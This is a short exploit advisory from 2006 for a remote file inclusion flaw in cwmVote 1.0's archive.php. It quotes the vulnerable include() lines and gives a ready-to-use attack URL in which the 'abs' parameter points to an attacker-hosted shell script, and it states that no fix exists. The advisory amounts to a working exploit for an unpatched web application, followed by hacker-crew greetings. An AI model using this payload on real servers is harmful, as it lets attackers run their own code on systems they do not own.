cwmVote 1.0 (archive.php) Remote File Include Vulnerability

2006-12-19 00:00:00

################################################################
# #
# cwmVote 1.0 File Include Vulnerability #
# #
# F0und3R: bd0rk || SOH-Crew #
# #
# Website: www.soh-crew.it.tt #
# #
# Download: http://explorer.cwm-design.de/dirs/41/cwmVote.rar #
# #
################################################################

Vulnerable Code in archive.php


Code: include($abs."inc/functions.inc.php");
include($abs."inc/conf.mysql.inc.php");
include($abs."inc/conf.pw.inc.php");

Usage: http://[target]/[cwm_vote_path]/archive.php?abs=http://[Shellscript]

Greetings: TheJT, Lu7k, Kacper, nukedx, str0ke

#

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.